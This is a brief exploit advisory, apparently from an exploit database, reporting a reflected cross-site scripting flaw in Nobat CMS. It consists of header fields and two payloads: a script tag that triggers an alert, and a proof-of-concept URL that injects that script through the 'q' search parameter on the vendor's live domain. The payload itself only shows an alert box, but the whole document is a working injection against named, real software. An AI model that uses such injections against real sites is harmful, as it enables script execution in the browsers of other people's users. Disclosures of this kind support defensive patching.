=========================================================
# Exploit Title: Nobat CMS - Cross-Site Scripting (XSS)
# Google Dork: -
# Date: 2022-02-02
# Exploit Author: Mr.B3nY
# Vendor Homepage: www.nobat.ir
# Tested on: Parrot OS
# Vulnerability : Cross-Site Scripting (XSS)
=========================================================
[+] PAYLOAD :- " <script>alert('PAYL0AD')</script>"
=========================================================
[+] POC :- www.nobat.ir/118/?q=<script>alert("XsS")</script>
=========================================================